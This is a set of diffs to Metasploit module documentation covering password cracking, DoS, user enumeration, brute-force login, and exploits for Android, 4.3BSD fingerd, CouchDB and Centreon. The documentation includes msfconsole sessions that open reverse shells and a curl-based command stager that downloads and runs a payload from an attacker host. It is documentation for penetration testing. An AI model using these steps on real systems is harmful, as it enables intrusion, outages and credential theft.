-  * `LM`, or `LANMAN` based passwords
-  * `NT`, `NTLM`, or `NTLANMAN` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `nt` or `lm` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_windows_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm
-creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_windows_fast 
-msf5 auxiliary(analyze/jtr_windows_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-koittz
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1v82lkm
-[*] Cracking lm hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 1177Kp/s 1177Kc/s 1177KC/s PLANO..VAGRANT
-Session completed
-[*] Cracking lm hashes in single mode...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:02 DONE (2019-02-11 19:34) 0g/s 4634Kp/s 4634Kc/s 4634KC/s WAC1907..E1900
-Session completed
-[*] Cracking lm hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 41152Kp/s 41152Kc/s 41152KC/s 0766269..0769743
-Session completed
-[*] Cracked Passwords this run:
-[+] lm_password:password
-[*] Cracking nt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking nt hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking nt hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] lm_password:password
-[+] nt_password:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_windows_fast) > creds
-Credentials
-===========
-
-host  origin  service  public       private                                                            realm  private_type  JtR Format
----  ------  -------  ------       -------                                                            -----  ------------  ----------
-                       lm_password  password                                                                  Password      
-                       lm_password  e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
-                       nt_password  password                                                                  Password      
-                       nt_password  aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
-
-```
@@ -1,14 +1,14 @@
-## Description
-This module triggers a Denial of Service vulnerability in the Flexense Enterprise HTTP server. It is possible to trigger 
-a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.  
+## Vulnerable Application

+### Description
+
+This module triggers a Denial of Service vulnerability in the Flexense Enterprise HTTP server. It is possible to trigger
+a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.

-## Verification Steps
 According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24
 Following list of softwares are vulnerable to Denial Of Service.
 read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065

-	
 DiskBoss Enterprise    <= v9.0.18
 Sync Breeze Enterprise <= v10.6.24
 Disk Pulse Enterprise  <= v10.6.24
@@ -16,8 +16,7 @@ Disk Savvy Enterprise  <= v10.6.24
 Dup Scout Enterprise   <= v10.6.24
 VX Search Enterprise   <= v10.6.24

-
-**Vulnerable Application Link** 
+**Vulnerable Application Link**
 http://www.diskboss.com/downloads.html
 http://www.syncbreeze.com/downloads.html
 http://www.diskpulse.com/downloads.html
@@ -25,7 +24,8 @@ http://www.disksavvy.com/downloads.html
 http://www.dupscout.com/downloads.html


-## Vulnerable Application Installation Setup.
+### Installation Setup.
+
 All Flexense applications that are listed above can be installed by following these steps.

 Download Application : ```https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS/raw/master/syncbreezeent_setup_v10.6.24.exe```
@@ -51,7 +51,9 @@ Check the box saying: ```Enable web server on port:...```
  8. Web server will crash after 200-1000 request depending on the OS version and system memory.

 ## Scenarios
-**TESTED AGAINST WINDOWS 7/10**
+
+### WINDOWS 7/10
+
 ```
 msf5 > use auxiliary/dos/http/flexense_http_server_dos 
 msf5 auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27
@@ -6,7 +6,7 @@ Versions before 0.3.19 are vulnerable.
 Any application that uses a vulnerable version of this module and passes untrusted input
 to the module will be vulnerable.

-## How to Install
+### How to Install

 To install a vulnerable version of `marked`, run:
 ```
@@ -15,8 +15,6 @@ npm i marked@0.3.19

 ## Verification Steps

-Example steps in this format (is also in the PR):
-
 1. Create a new directory for test application.
 2. Copy below example server into test application directory as `server.js`.
 3. Run `npm i express` to install express in the test application directory.
@@ -0,0 +1,16 @@
+## Vulnerable Application
+Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the `/shutdown` URL in applications that do
+not have a user login area enabled.
+
+## Scenario
+
+![72550314-80cd8a00-38a3-11ea-9bad-942668a29390](https://user-images.githubusercontent.com/15425071/72602337-29bdc880-3928-11ea-8aec-ddadb3ff4f2d.png)
+
+## Verification Steps :
+
+List the steps needed to make sure this thing works
+
+1. Start ```msfconsole```
+2. ```use auxiliary/dos/http/tautulli_shutdown_exec```
+3. ```set RHOSTS XXX.XXX.XXX.XXX```
+4. ```run```
@@ -6,7 +6,7 @@ Any application that uses a vulnerable version of this module and calls the `get
 or `getResult` functions will be vulnerable to this module.  An example server is provided
 below.

-## How to Install
+### How to Install

 To install a vulnerable version of `ua-parser-js`, run:
 ```
@@ -15,8 +15,6 @@ npm i ua-parser-js@0.7.15

 ## Verification Steps

-Example steps in this format (is also in the PR):
-
 1. Create a new directory for test application.
 2. Copy below example server into test application directory as `server.js`.
 3. Run `npm i express` to install express in the test application directory.
@@ -10,18 +10,14 @@

 ## Verification Steps

-  Example steps in this format (is also in the PR):
-
  1. Start msfconsole
-  1. Do: `use auxiliary/dos/smb/smb_loris`
-  1. Do: `set rhost [IP]`
-  1. Do: `run`
-  1. Target should allocate increasing amounts of memory.
+  2. Do: `use auxiliary/dos/smb/smb_loris`
+  3. Do: `set rhost [IP]`
+  4. Do: `run`
+  5. Target should allocate increasing amounts of memory.

 ## Scenarios

-### 
-
 ```
 msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
 msf auxiliary(smb_loris) > set RHOST 192.168.172.138
@@ -1,6 +1,6 @@
 ## Vulnerable Application

-More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
+More information can be found on the [Rapid7 Blog](https://blog.rapid7.com/2010/03/08/locate-and-exploit-the-energizer-trojan).
 Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.

 The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+This module determines if usernames are valid on a server running Apache with the `UserDir` directive enabled. 
+It takes advantage of Apache returning different error codes for usernames that do not exist and for usernames
+that exist but have no `public_html` directory.
+
+### Enabling  `UserDir` on Ubuntu 16.04 with Apache installed
+1. `sudo a2enmod userdir`
+2. `sudo service apache2 restart`
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/apache_userdir_enum```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```run```
+
+## Scenarios
+
+### Apache 2.4.18 on Ubuntu 16.04
+
+![apache_userdir_enum Demo](https://i.imgur.com/UZanfTI.gif)
+
+```
+msf5 > use auxiliary/scanner/http/apache_userdir_enum
+msf5 auxiliary(scanner/http/apache_userdir_enum) > set rhosts alderaan
+rhosts => alderaan
+msf5 auxiliary(scanner/http/apache_userdir_enum) > run
+
+[*] http://192.168.6.172/~ - Trying UserDir: ''
+[*] http://192.168.6.172/ - Apache UserDir: '' not found
+[*] http://192.168.6.172/~4Dgifts - Trying UserDir: '4Dgifts'
+[*] http://192.168.6.172/ - Apache UserDir: '4Dgifts' not found
+...
+[*] http://192.168.6.172/~zabbix - Trying UserDir: 'zabbix'
+[*] http://192.168.6.172/ - Apache UserDir: 'zabbix' not found
+[*] http://192.168.6.172/~vagrant - Trying UserDir: 'vagrant'
+[*] http://192.168.6.172/ - Apache UserDir: 'vagrant' not found
+[+] http://192.168.6.172/ - Users found: backup, bin, daemon, games, gnats, irc, list, lp, mail, man, messagebus, news, nobody, proxy, sshd, sync, sys, syslog, uucp
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -11,8 +11,6 @@

 ## Verification Steps

-  Example steps in this format (is also in the PR):
-
  1. Install IBM MQ Server 7.5, 8, or 9
  2. Start msfconsole
  3. Do: ```use auxiliary/scanner/misc/ibm_mq_channel_brute```
@@ -21,7 +19,17 @@
  6. Do: ```set rport <port>```
  7. Do: ```run```
  
-  Example output:
+## Options
+
+  **The CHANNELS_FILE option**
+
+  This option should contain the path to a text file which contains a list of channel names that will be checked. One channel name per line.
+
+## Scenarios
+
+  This module can be used to identify a list of channel names that are configured on the Queue Manager. Additionally, the module will return whether each identified channel uses SSL and if it MQI type.
+  After obtaining a list of valid channel names, these can be used to further enumerate the MQ installation. For example, the ibm_mq_enum module can be executed using a valid channel name in order to obtain information regarding the Queue Manager.
+
  ```
  msf auxiliary(scanner/misc/ibm_mq_channel_brute) > run
  
@@ -35,14 +43,3 @@
 [*] Auxiliary module execution completed

  ```
-
-## Options
-
-  **The CHANNELS_FILE option**
-
-  This option should contain the path to a text file which contains a list of channel names that will be checked. One channel name per line.
-
-## Scenarios
-
-  This module can be used to identify a list of channel names that are configured on the Queue Manager. Additionally, the module will return whether each identified channel uses SSL and if it MQI type.
-  After obtaining a list of valid channel names, these can be used to further enumerate the MQ installation. For example, the ibm_mq_enum module can be executed using a valid channel name in order to obtain information regarding the Queue Manager.
@@ -1,5 +1,6 @@
 ## Vulnerable Application
-   * IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
+
+  * IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
  * Tested on IBM MQ 7.5, 8 and 9
  * Usage:
    * Download and install MQ Server
@@ -8,7 +9,7 @@
    * Run the module

 ## Verification Steps
-   Example steps in this format (is also in the PR):
+
  1. Install IBM MQ Server 7.5, 8, or 9
  2. Start msfconsole
  3. Do: ```use auxiliary/scanner/misc/ibm_mq_enum```
@@ -16,8 +17,16 @@
  5. Do: ```set rhosts <target_IP>```
  6. Do: ```set rport <port>```
  7. Do: ```run```
-  
-  Example output:
+
+## Options
+
+### CHANNEL
+   
+   This option should contain the name of a valid MQ channel. This can be obtained using the module ```auxiliary/scanner/misc/ibm_mq_channel_brute```
+
+## Scenarios
+   This module can be used to obtain the Queue Manager name as well as the version of the MQ being used on the target host. When the Queue Manager name and a valid MQI channel name without SSL is known , the module ```auxiliary/scanner/misc/ibm_mq_login``` can be used to identify usernames that can authenticate to the Queue Manager.
+
 ```
 msf auxiliary(scanner/misc/ibm_mq_enum) > run

@@ -26,11 +35,3 @@ msf auxiliary(scanner/misc/ibm_mq_enum) > run
 [*] Auxiliary module execution completed

 ```
-
-## Options
-   **The CHANNEL option**
-   
-   This option should contain the name of a valid MQ channel. This can be obtained using the module ```auxiliary/scanner/misc/ibm_mq_channel_brute```
-
-## Scenarios
-   This module can be used to obtain the Queue Manager name as well as the version of the MQ being used on the target host. When the Queue Manager name and a valid MQI channel name without SSL is known , the module ```auxiliary/scanner/misc/ibm_mq_login``` can be used to identify usernames that can authenticate to the Queue Manager.
@@ -9,8 +9,8 @@
  * Allow remote connections for admin users by removing the CHLAUTH record that denies all users or configure access for a specific username.
  * Run the module
 
- ## Verification Steps
-  Example steps in this format (is also in the PR):
+## Verification Steps
+
  1. Install IBM MQ Server 7.5, 8, or 9
  2. Start msfconsole
  3. Do: ```use auxiliary/scanner/misc/ibm_mq_login```
@@ -21,7 +21,27 @@
  7. Do: ```set rport <port>```
  8. Do: ```run```
  
-  Example output:
+## Options
+
+### USERNAMES_FILE
+   
+   This option should contain the path to a text file which contains a list of usernames that will be checked. One username per line.
+   
+### QUEUE_MANAGER
+   
+   This option should contain the name of the target Queue Manager.
+   
+### CHANNEL
+   
+   This option should contain the name of a server-connection channel that will be used to connect to the Queue Manager.
+   
+## Scenarios
+
+   This module can be used to identify a list of usernames that are allowed to connect to the Queue Manager. This module requires the name of a valid server-connection channel, the Queue Manager's name which can be obtained by running the following 2 modules:
+   * ```auxiliary/scanner/misc/ibm_mq_channel_brute```
+   * ```auxiliary/scanner/misc/ibm_mq_enum```
+   After identifying a valid username, MQ Explorer can be used to connect to the Queue Manager using the information gathered.
+
  ```
 msf auxiliary(scanner/misc/ibm_mq_login) > run

@@ -33,21 +53,3 @@ msf auxiliary(scanner/misc/ibm_mq_login) > run
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
   ```
- ## Options
-   **The USERNAMES_FILE option**
-   
-   This option should contain the path to a text file which contains a list of usernames that will be checked. One username per line.
-   
-   **The QUEUE_MANAGER option**
-   
-   This option should contain the name of the target Queue Manager.
-   
-   **The CHANNEL option**
-   
-   This option should contain the name of a server-connection channel that will be used to connect to the Queue Manager.
-   
- ## Scenarios
-   This module can be used to identify a list of usernames that are allowed to connect to the Queue Manager. This module requires the name of a valid server-connection channel, the Queue Manager's name which can be obtained by running the following 2 modules:
-   * ```auxiliary/scanner/misc/ibm_mq_channel_brute```
-   * ```auxiliary/scanner/misc/ibm_mq_enum```
-   After identifying a valid username, MQ Explorer can be used to connect to the Queue Manager using the information gathered.
@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+This module attempts to authenticate against an Oracle RDBMS instance using username and password
+combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. The default wordlist
+is [oracle_default_userpass.txt](https://github.com/rapid7/metasploit-framework/blob/master/data/wordlists/oracle_default_userpass.txt).
+
+Default port for SQL*Net listener is 1521/tcp. If this port is open, try this module to login.
+
+### Install
+
+This module needs nmap 5.50 or above to function.  However due to an [nmap bug](https://github.com/nmap/nmap/issues/1475) versions
+6.50-7.80 may not work.
+
+```
+nmap -V
+apt-get install nmap
+```
+
+In addition, if you encounter errors due to OCI libraries not being found, please see the
+[How to get Oracle Support working with Kali Linux](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux).
+
+For Oracle Server, please follow the following
+[guide](https://tutorialforlinux.com/2019/09/17/how-to-install-oracle-12c-r2-database-on-ubuntu-18-04-bionic-64-bit-easy-guide/).
+
+## Verification Steps
+
+  1. Install Oracle Database server and metasploit components
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/oracle/oracle_login```
+  4. Do: ```run```
+
+## Options
+
+  **BLANK_PASSWORDS**
+
+  Try blank passwords for all users
+
+  **BRUTEFORCE_SPEED**
+
+  How fast to bruteforce, scale of 0 to 5
+
+  **DB_ALL_CREDS**
+
+  Try each user/password couple stored in the current database
+
+  **DB_ALL_PASS**
+
+  Add all passwords in the current database to the list to try
+
+  **DB_ALL_USERS**
+
+  Add all users in the current database to the list to try
+
+  **NMAP_VERBOSE**
+
+  Display nmap output
+
+  **PASSWORD**
+
+  Specify one password to use for all usernames
+
+  **PASS_FILE**
+
+  File of passwords, one per line.
+
+  **RHOSTS**
+
+  Target hosts, range CIDR identifier, or hosts file with syntax 'file:<path>'
+
+  **RPORTS**
+
+  Ports of the target
+
+  **SID**
+
+  Instance (SID) to authenticate against. Default `XE`
+
+  **STOP_ON_SUCCESS**
+
+  Stop the bruteforce attack when a valid combination is found
+
+  **THREADS**
+
+  Number of concurrent threads (max of one per host)
+
+  **USERNAME**
+
+  Specific username to try for all passwords
+
+  **USERPASS_FILE**
+
+  File of username and passwords, separated by space, one set per line. Default `oracle_default_userpass.txt`
+
+  **USER_AS_PASS**
+
+  Try the username as the password for all users
+
+  **USER_FILE**
+
+  File containing usernames, one per line
+
+## Scenarios
+
+Unfortunately due to the nmap bug mentioned above, it was not possible to create an example run.
@@ -0,0 +1,40 @@
+## Vulnerable Application
+
+This exploit module currently targets a very specific build of Android on specific set of hardware targets:
+
+ - Google Pixel 2 or Pixel XL 2 phones running the September 2019 security patch level.
+
+This exploit module would have to be retargeted for any other potentially vulnerable build or hardware target.
+
+One difficult issue with the Google Pixel 2 is that, while many Google phones have an unlocked bootloader, making it easy to download older Android revisions, the latest Pixel 2 updates show this feature has been disabled or broken [older revisions to the device firmware](https://developers.google.com/android/images). This may be a firmware bug or intentional, but Google themselves do not appear to have an answer [for the problem](https://support.google.com/pixelphone/thread/14920605?hl=en). For testing, you may need a phone never updated to a later Android revision.
+
+## Verification Steps
+
+ - Get an android meterpreter session on a Pixel 2 or Pixel XL 2 with the right kernel:
+
+ `msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j`
+
+ - Currently this only works on the Pixel 2 (and Pixel 2 XL) with september 2019 Security patch level. Validate the kernel version looks like this:
+
+```
+uname -a
+Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64
+```
+
+ - Run the exploit:
+
+```
+msf5 exploit(multi/handler) > use exploit/android/local/binder_uaf
+msf5 exploit(android/local/binder_uaf) > set LHOST IPADDR
+msf5 exploit(android/local/binder_uaf) > set LPORT 4448 (different from your Android meterpreter port)
+LPORT => 4448
+msf5 exploit(android/local/binder_uaf) > set SESSION -1
+SESSION => -1
+msf5 exploit(android/local/binder_uaf) > run
+```
+
+ - **Verify** the new session can read and write private application data (in /data/data/..../)
+
+## Scenarios
+
+This module illustrates a privesc that, when chained with other exploit vectors, could turn an unprivileged sandboxed exploit into a sandbox escape and system compromise. Note that the target application may need to match the kernel CPU type, so for instance a 64-bit Chrome would need to be targeted with a 64-bit kernel.
@@ -1,10 +1,13 @@
-## Introduction
+## Vulnerable Application
+
+### Description

 This module exploits a stack buffer overflow in `fingerd` on 4.3BSD.
+
 This vulnerability was exploited by the Morris worm in 1988-11-02.
 Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.

-## Setup
+### Setup

 A Docker environment for 4.3BSD on VAX is available at
 <https://github.com/wvu/ye-olde-bsd>.
@@ -14,7 +17,7 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

-## Targets
+### Targets

 ```
 Id  Name
@@ -22,6 +25,10 @@ Id  Name
 0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
 ```

+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
 ## Options

 **RPORT**
@@ -31,46 +38,43 @@ port may be forwarded when NAT (SLiRP) is used in SIMH.

 **PAYLOAD**

-Set this to a BSD VAX payload. Currently only
+Set this to a BSD VAX payload. Currently, only
 `bsd/vax/shell_reverse_tcp` is supported.

-## Usage
+## Scenarios
+
+### `fingerd` 5.1 on 4.3BSD

 ```
-msf5 exploit(bsd/finger/morris_fingerd_bof) > options
+msf5 > use exploit/bsd/finger/morris_fingerd_bof
+msf5 exploit(bsd/finger/morris_fingerd_bof) > show missing

 Module options (exploit/bsd/finger/morris_fingerd_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
-   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
-   RPORT   79               yes       The target port (TCP)
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'


 Payload options (bsd/vax/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
-   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
-
+   LHOST                   yes       The listen address (an interface may be specified)

+msf5 exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(bsd/finger/morris_fingerd_bof) > set lhost 192.168.56.1
+lhost => 192.168.56.1
 msf5 exploit(bsd/finger/morris_fingerd_bof) > run

-[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Started reverse TCP handler on 192.168.56.1:4444
 [*] 127.0.0.1:79 - Connecting to fingerd
 [*] 127.0.0.1:79 - Sending 533-byte buffer
-[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58015) at 2020-02-06 15:45:33 -0600

-whoami
-nobody
+who am i
+nobody   tty??   Feb  6 13:45
 cat /etc/motd
 4.3 BSD UNIX #1: Fri Jun  6 19:55:29 PDT 1986

@@ -1,6 +1,9 @@
 ## Description  

-CouchDB administrative users can configure the database server via HTTP(S).Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,including downloading and executing scripts from the public internet.
+CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options
+include paths for operating system-level binaries that are subsequently launched by CouchDB.
+This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell
+commands as the CouchDB user,including downloading and executing scripts from the public internet.

 ## Vulnerable Application  

@@ -12,15 +15,13 @@ Couchdb 2.x: https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635
 Couchdb 1.x: https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12636


-## Vulnerable Application Installation Setup.
+### Vulnerable Application Installation Setup.

 Change dictory to CVE-2017-1263X, and run `docker-compose up -d` 


 ## Verification Steps  

-  Example steps in this format (is also in the PR):
-
  1. Install the application
  2. Start msfconsole
  3. Do: ```use modules/exploits/linux/http/apache_couchdb_cmd_exec.rb```
@@ -37,18 +38,18 @@ Change dictory to CVE-2017-1263X, and run `docker-compose up -d`

 ## Options

- URIPATH
+### URIPATH

 ``URIPATH`` by default is random, you can change it if you want.

- HttpUsername, HttpPassword  
+### HttpUsername, HttpPassword  

-Sometimes it  requires authentication, set these options to authorize.  
+Sometimes it requires authentication, set these options to authorize.  


 ## Scenarios  

-TESTED AGAINST LINUX
+### Apache CouchDB on Linux

 ```
 msf5 > use modules/exploits/linux/http/apache_couchdb_cmd_exec.rb
@@ -0,0 +1,101 @@
+## Vulnerable Application
+
+Centreon is an open source IT monitoring solution by Centreon, a leading Paris-based software company.
+
+An authenticated user with sufficient administrative rights to manage pollers can use this functionality to
+execute arbitrary commands remotely. Usually, the miscellaneous commands are used by the additional modules
+(to perform certain actions), by the scheduler for data processing, etc.
+
+This module uses this functionality to obtain a remote shell on the target.
+
+Tested on:
+
+ * [Centreon 19.10.8](http://vm.download.centreon.com/centreon-vbox-vm-19_10-3.el7.ovf.zip)
+ * [Centreon 19.10.5](http://vm.download.centreon.com/centreon-vbox-vm-19_10-1.el7.ovf.zip)
+
+## Verification Steps
+
+ 1. Install the module as usual
+ 2. Start msfconsole
+ 3. Do: `use exploit/linux/http/centreon_pollers_auth_rce`
+ 4. Do: `set RHOSTS [IP]`
+ 5. Do: `set LHOST [IP]`
+ 6. Do: `set USERNAME [USERNAME]`
+ 7. Do: `sat PASSWORD [PASSWORD]`
+ 8. Do: `set VERBOSE true`
+ 9. Do: `run`
+
+## Scenarios
+
+```
+msf5 > use exploit/linux/http/centreon_pollers_auth_rce
+msf5 exploit(linux/http/centreon_pollers_auth_rce) > set rhosts [IP]
+rhosts => [IP]
+msf5 exploit(linux/http/centreon_pollers_auth_rce) > set username admin
+username => admin
+msf5 exploit(linux/http/centreon_pollers_auth_rce) > set password centreon
+password => centreon
+msf5 exploit(linux/http/centreon_pollers_auth_rce) > set lhost [IP]
+lhost => [IP]
+msf5 exploit(linux/http/centreon_pollers_auth_rce) > set verbose true
+verbose => true
+msf5 exploit(linux/http/centreon_pollers_auth_rce) > run
+
+[*] Started reverse TCP handler on XXX.XXX.XXX.XXX:4444
+[*] Send authentication request.
+[*] Successful authenticated.
+[*] Upload command payload on the target.
+[*] Create new poller entry on the target.
+[*] Reload the poller to trigger exploitation.
+[*]  -- Generating files.
+[*]  -- Restarting engine.
+[*]  -- Executing command.
+[*] Command shell session 1 opened (XXX.XXX.XXX.XXX:4444 -> XXX.XXX.XXX.XXX:59624) at 2020-02-03 17:41:13 +0400
+
+id
+uid=48(apache) gid=48(apache) groups=48(apache),993(centreon-engine),994(centreon-broker),998(centreon),999(nagios)
+
+  --or--
+
+msf5 exploit(linux/http/centreon_pollers_auth_rce) > set target 1
+target => 1
+msf5 exploit(linux/http/centreon_pollers_auth_rce) > run
+
+[*] Started reverse TCP handler on XXX.XXX.XXX.XXX:4444
+[*] Send authentication request.
+[*] Successful authenticated.
+[*] Using URL: http://0.0.0.0:8080/fNqJS82wB
+[*] Local IP: http://XXX.XXX.XXX.XXX:8080/fNqJS82wB
+[*] Generated command stager: ["curl -so /tmp/MBoYQsJv http://XXX.XXX.XXX.XXX:8080/fNqJS82wB;chmod +x /tmp/MBoYQsJv;/tmp/MBoYQsJv;rm -f /tmp/MBoYQsJv"]
+[*] Upload command payload on the target.
+[*] Create new poller entry on the target.
+[*] Reload the poller to trigger exploitation.
+[*]  -- Generating files.
+[*]  -- Restarting engine.
+[*]  -- Executing command.
+[*] Client XXX.XXX.XXX.XXX (curl/7.29.0) requested /fNqJS82wB
+[*] Sending payload to XXX.XXX.XXX.XXX (curl/7.29.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3021284 bytes) to XXX.XXX.XXX.XXX
+[*] Meterpreter session 2 opened (XXX.XXX.XXX.XXX:4444 -> XXX.XXX.XXX.XXX:60536) at 2020-02-03 17:44:47 +0400
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: uid=48, gid=48, euid=48, egid=48
+meterpreter >
+```
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Reverse shell (In-Memory)
+1   Meterpreter (Dropper)
+```
+
+## References
+
+1. <https://www.exploit-db.com/exploits/47969>
+2. <https://www.exploit-db.com/exploits/47977>
+3. <https://www.exploit-db.com/exploits/47978>
@@ -0,0 +1,70 @@
+## Vulnerable Application
+This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3 and prior in order to execute arbitrary commands as root.
+
+The module first exploits a hardcoded admin API key in EyesOfNetwork API version 2.4.2 (CVE-2020-8657) in order to generate a valid access token and use it to create a new user with admin privileges. If the generated key is not valid, the admin API key is obtained via an SQL injection vulnerability affecting the same API version (CVE-2020-8656).
+
